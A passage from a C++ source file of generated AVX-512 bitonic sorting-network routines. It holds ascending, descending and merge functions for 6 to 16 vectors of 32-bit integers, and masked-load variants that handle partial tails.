__m512i& d05, __m512i& d06) { __m512i tmp; sort_04v_ascending(d01, d02, d03, d04); sort_02v_descending(d05, d06); tmp = d05; d05 = _mm512_max_epi32(d04, d05); d04 = _mm512_min_epi32(d04, tmp); tmp = d06; d06 = _mm512_max_epi32(d03, d06); d03 = _mm512_min_epi32(d03, tmp); 
sort_04v_merge_ascending(d01, d02, d03, d04); sort_02v_merge_ascending(d05, d06); } static INLINE void sort_06v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06) { __m512i tmp; sort_04v_descending(d01, d02, d03, d04); sort_02v_ascending(d05, d06); tmp = d05; d05 = _mm512_max_epi32(d04, d05); d04 = _mm512_min_epi32(d04, tmp); tmp = d06; d06 = _mm512_max_epi32(d03, d06); d03 = _mm512_min_epi32(d03, tmp); sort_04v_merge_descending(d01, d02, d03, d04); sort_02v_merge_descending(d05, d06); } static INLINE void sort_06v_merge_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d05, d01); d05 = _mm512_max_epi32(d05, tmp); tmp = d02; d02 = _mm512_min_epi32(d06, d02); d06 = _mm512_max_epi32(d06, tmp); sort_04v_merge_ascending(d01, d02, d03, d04); sort_02v_merge_ascending(d05, d06); } static INLINE void sort_06v_merge_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d05, d01); d05 = _mm512_max_epi32(d05, tmp); tmp = d02; d02 = _mm512_min_epi32(d06, d02); d06 = _mm512_max_epi32(d06, tmp); sort_04v_merge_descending(d01, d02, d03, d04); sort_02v_merge_descending(d05, d06); } static INLINE void sort_07v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07) { __m512i tmp; sort_04v_ascending(d01, d02, d03, d04); sort_03v_descending(d05, d06, d07); tmp = d05; d05 = _mm512_max_epi32(d04, d05); d04 = _mm512_min_epi32(d04, tmp); tmp = d06; d06 = _mm512_max_epi32(d03, d06); d03 = _mm512_min_epi32(d03, tmp); tmp = d07; d07 = _mm512_max_epi32(d02, d07); d02 = _mm512_min_epi32(d02, tmp); sort_04v_merge_ascending(d01, d02, d03, d04); sort_03v_merge_ascending(d05, d06, d07); } static INLINE void sort_07v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07) { __m512i tmp; sort_04v_descending(d01, d02, d03, d04); sort_03v_ascending(d05, d06, d07); tmp = d05; d05 = _mm512_max_epi32(d04, d05); d04 = _mm512_min_epi32(d04, tmp); tmp = d06; d06 = _mm512_max_epi32(d03, d06); d03 = _mm512_min_epi32(d03, tmp); tmp = d07; d07 = _mm512_max_epi32(d02, d07); d02 = _mm512_min_epi32(d02, tmp); sort_04v_merge_descending(d01, d02, d03, d04); sort_03v_merge_descending(d05, d06, d07); } static INLINE void sort_07v_merge_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d05, d01); d05 = _mm512_max_epi32(d05, tmp); tmp = d02; d02 = _mm512_min_epi32(d06, d02); d06 = _mm512_max_epi32(d06, tmp); tmp = d03; d03 = _mm512_min_epi32(d07, d03); d07 = _mm512_max_epi32(d07, tmp); sort_04v_merge_ascending(d01, d02, d03, d04); sort_03v_merge_ascending(d05, d06, d07); } static INLINE void sort_07v_merge_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d05, d01); d05 = _mm512_max_epi32(d05, tmp); tmp = d02; d02 = _mm512_min_epi32(d06, d02); d06 = _mm512_max_epi32(d06, tmp); tmp = d03; d03 = _mm512_min_epi32(d07, d03); d07 = _mm512_max_epi32(d07, tmp); sort_04v_merge_descending(d01, d02, d03, d04); sort_03v_merge_descending(d05, d06, d07); } static NOINLINE void sort_08v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08) { __m512i tmp; 
sort_04v_ascending(d01, d02, d03, d04); sort_04v_descending(d05, d06, d07, d08); tmp = d05; d05 = _mm512_max_epi32(d04, d05); d04 = _mm512_min_epi32(d04, tmp); tmp = d06; d06 = _mm512_max_epi32(d03, d06); d03 = _mm512_min_epi32(d03, tmp); tmp = d07; d07 = _mm512_max_epi32(d02, d07); d02 = _mm512_min_epi32(d02, tmp); tmp = d08; d08 = _mm512_max_epi32(d01, d08); d01 = _mm512_min_epi32(d01, tmp); sort_04v_merge_ascending(d01, d02, d03, d04); sort_04v_merge_ascending(d05, d06, d07, d08); } static NOINLINE void sort_08v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08) { __m512i tmp; sort_04v_descending(d01, d02, d03, d04); sort_04v_ascending(d05, d06, d07, d08); tmp = d05; d05 = _mm512_max_epi32(d04, d05); d04 = _mm512_min_epi32(d04, tmp); tmp = d06; d06 = _mm512_max_epi32(d03, d06); d03 = _mm512_min_epi32(d03, tmp); tmp = d07; d07 = _mm512_max_epi32(d02, d07); d02 = _mm512_min_epi32(d02, tmp); tmp = d08; d08 = _mm512_max_epi32(d01, d08); d01 = _mm512_min_epi32(d01, tmp); sort_04v_merge_descending(d01, d02, d03, d04); sort_04v_merge_descending(d05, d06, d07, d08); } static NOINLINE void sort_08v_merge_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d05, d01); d05 = _mm512_max_epi32(d05, tmp); tmp = d02; d02 = _mm512_min_epi32(d06, d02); d06 = _mm512_max_epi32(d06, tmp); tmp = d03; d03 = _mm512_min_epi32(d07, d03); d07 = _mm512_max_epi32(d07, tmp); tmp = d04; d04 = _mm512_min_epi32(d08, d04); d08 = _mm512_max_epi32(d08, tmp); sort_04v_merge_ascending(d01, d02, d03, d04); sort_04v_merge_ascending(d05, d06, d07, d08); } static NOINLINE void sort_08v_merge_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d05, d01); d05 = _mm512_max_epi32(d05, tmp); tmp = d02; d02 = _mm512_min_epi32(d06, d02); d06 = _mm512_max_epi32(d06, tmp); tmp = d03; d03 = _mm512_min_epi32(d07, d03); d07 = _mm512_max_epi32(d07, tmp); tmp = d04; d04 = _mm512_min_epi32(d08, d04); d08 = _mm512_max_epi32(d08, tmp); sort_04v_merge_descending(d01, d02, d03, d04); sort_04v_merge_descending(d05, d06, d07, d08); } static INLINE void sort_09v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09) { __m512i tmp; sort_08v_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_01v_descending(d09); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); sort_08v_merge_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_01v_merge_ascending(d09); } static INLINE void sort_09v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09) { __m512i tmp; sort_08v_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_01v_ascending(d09); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); sort_08v_merge_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_01v_merge_descending(d09); } static INLINE void sort_10v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10) { __m512i tmp; sort_08v_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_02v_descending(d09, d10); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = 
_mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); sort_08v_merge_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_02v_merge_ascending(d09, d10); } static INLINE void sort_10v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10) { __m512i tmp; sort_08v_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_02v_ascending(d09, d10); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); sort_08v_merge_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_02v_merge_descending(d09, d10); } static INLINE void sort_11v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11) { __m512i tmp; sort_08v_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_03v_descending(d09, d10, d11); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); sort_08v_merge_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_03v_merge_ascending(d09, d10, d11); } static INLINE void sort_11v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11) { __m512i tmp; sort_08v_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_03v_ascending(d09, d10, d11); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); sort_08v_merge_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_03v_merge_descending(d09, d10, d11); } static NOINLINE void sort_12v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11, __m512i& d12) { __m512i tmp; sort_08v_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_04v_descending(d09, d10, d11, d12); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); sort_08v_merge_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_04v_merge_ascending(d09, d10, d11, d12); } static NOINLINE void sort_12v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11, __m512i& d12) { __m512i tmp; sort_08v_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_04v_ascending(d09, d10, d11, d12); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); sort_08v_merge_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_04v_merge_descending(d09, 
d10, d11, d12); } static INLINE void sort_13v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11, __m512i& d12, __m512i& d13) { __m512i tmp; sort_08v_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_05v_descending(d09, d10, d11, d12, d13); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); tmp = d13; d13 = _mm512_max_epi32(d04, d13); d04 = _mm512_min_epi32(d04, tmp); sort_08v_merge_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_05v_merge_ascending(d09, d10, d11, d12, d13); } static INLINE void sort_13v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11, __m512i& d12, __m512i& d13) { __m512i tmp; sort_08v_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_05v_ascending(d09, d10, d11, d12, d13); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); tmp = d13; d13 = _mm512_max_epi32(d04, d13); d04 = _mm512_min_epi32(d04, tmp); sort_08v_merge_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_05v_merge_descending(d09, d10, d11, d12, d13); } static INLINE void sort_14v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11, __m512i& d12, __m512i& d13, __m512i& d14) { __m512i tmp; sort_08v_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_06v_descending(d09, d10, d11, d12, d13, d14); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); tmp = d13; d13 = _mm512_max_epi32(d04, d13); d04 = _mm512_min_epi32(d04, tmp); tmp = d14; d14 = _mm512_max_epi32(d03, d14); d03 = _mm512_min_epi32(d03, tmp); sort_08v_merge_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_06v_merge_ascending(d09, d10, d11, d12, d13, d14); } static INLINE void sort_14v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11, __m512i& d12, __m512i& d13, __m512i& d14) { __m512i tmp; sort_08v_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_06v_ascending(d09, d10, d11, d12, d13, d14); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); tmp = d13; d13 = _mm512_max_epi32(d04, d13); d04 = _mm512_min_epi32(d04, tmp); tmp = d14; d14 = _mm512_max_epi32(d03, d14); d03 = _mm512_min_epi32(d03, tmp); sort_08v_merge_descending(d01, 
d02, d03, d04, d05, d06, d07, d08); sort_06v_merge_descending(d09, d10, d11, d12, d13, d14); } static INLINE void sort_15v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11, __m512i& d12, __m512i& d13, __m512i& d14, __m512i& d15) { __m512i tmp; sort_08v_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_07v_descending(d09, d10, d11, d12, d13, d14, d15); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); tmp = d13; d13 = _mm512_max_epi32(d04, d13); d04 = _mm512_min_epi32(d04, tmp); tmp = d14; d14 = _mm512_max_epi32(d03, d14); d03 = _mm512_min_epi32(d03, tmp); tmp = d15; d15 = _mm512_max_epi32(d02, d15); d02 = _mm512_min_epi32(d02, tmp); sort_08v_merge_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_07v_merge_ascending(d09, d10, d11, d12, d13, d14, d15); } static INLINE void sort_15v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11, __m512i& d12, __m512i& d13, __m512i& d14, __m512i& d15) { __m512i tmp; sort_08v_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_07v_ascending(d09, d10, d11, d12, d13, d14, d15); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); tmp = d13; d13 = _mm512_max_epi32(d04, d13); d04 = _mm512_min_epi32(d04, tmp); tmp = d14; d14 = _mm512_max_epi32(d03, d14); d03 = _mm512_min_epi32(d03, tmp); tmp = d15; d15 = _mm512_max_epi32(d02, d15); d02 = _mm512_min_epi32(d02, tmp); sort_08v_merge_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_07v_merge_descending(d09, d10, d11, d12, d13, d14, d15); } static NOINLINE void sort_16v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11, __m512i& d12, __m512i& d13, __m512i& d14, __m512i& d15, __m512i& d16) { __m512i tmp; sort_08v_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_08v_descending(d09, d10, d11, d12, d13, d14, d15, d16); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); tmp = d13; d13 = _mm512_max_epi32(d04, d13); d04 = _mm512_min_epi32(d04, tmp); tmp = d14; d14 = _mm512_max_epi32(d03, d14); d03 = _mm512_min_epi32(d03, tmp); tmp = d15; d15 = _mm512_max_epi32(d02, d15); d02 = _mm512_min_epi32(d02, tmp); tmp = d16; d16 = _mm512_max_epi32(d01, d16); d01 = _mm512_min_epi32(d01, tmp); sort_08v_merge_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_08v_merge_ascending(d09, d10, d11, d12, d13, d14, d15, d16); } static NOINLINE void sort_16v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, 
__m512i& d10, __m512i& d11, __m512i& d12, __m512i& d13, __m512i& d14, __m512i& d15, __m512i& d16) { __m512i tmp; sort_08v_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_08v_ascending(d09, d10, d11, d12, d13, d14, d15, d16); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); tmp = d13; d13 = _mm512_max_epi32(d04, d13); d04 = _mm512_min_epi32(d04, tmp); tmp = d14; d14 = _mm512_max_epi32(d03, d14); d03 = _mm512_min_epi32(d03, tmp); tmp = d15; d15 = _mm512_max_epi32(d02, d15); d02 = _mm512_min_epi32(d02, tmp); tmp = d16; d16 = _mm512_max_epi32(d01, d16); d01 = _mm512_min_epi32(d01, tmp); sort_08v_merge_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_08v_merge_descending(d09, d10, d11, d12, d13, d14, d15, d16); } static NOINLINE void sort_01v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 0)); sort_01v_ascending(d01); _mm512_mask_storeu_epi32((__m512i *) ptr + 0, mask, d01); } static NOINLINE void sort_02v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 1)); sort_02v_ascending(d01, d02); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_mask_storeu_epi32((__m512i *) ptr + 1, mask, d02); } static NOINLINE void sort_03v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 2)); sort_03v_ascending(d01, d02, d03); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_mask_storeu_epi32((__m512i *) ptr + 2, mask, d03); } static NOINLINE void sort_04v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 3)); sort_04v_ascending(d01, d02, d03, d04); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_mask_storeu_epi32((__m512i *) ptr + 3, mask, d04); } static NOINLINE void sort_05v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 4)); sort_05v_ascending(d01, d02, d03, d04, d05); _mm512_storeu_si512((__m512i *) ptr + 0, d01); 
_mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_mask_storeu_epi32((__m512i *) ptr + 4, mask, d05); } static NOINLINE void sort_06v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 5)); sort_06v_ascending(d01, d02, d03, d04, d05, d06); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_mask_storeu_epi32((__m512i *) ptr + 5, mask, d06); } static NOINLINE void sort_07v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 6)); sort_07v_ascending(d01, d02, d03, d04, d05, d06, d07); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_mask_storeu_epi32((__m512i *) ptr + 6, mask, d07); } static NOINLINE void sort_08v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_loadu_si512((__m512i const *) ptr + 6);; __m512i d08 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 7)); sort_08v_ascending(d01, d02, d03, d04, d05, d06, d07, d08); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_storeu_si512((__m512i *) ptr + 6, d07); _mm512_mask_storeu_epi32((__m512i *) ptr + 7, mask, d08); } static NOINLINE void sort_09v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = 
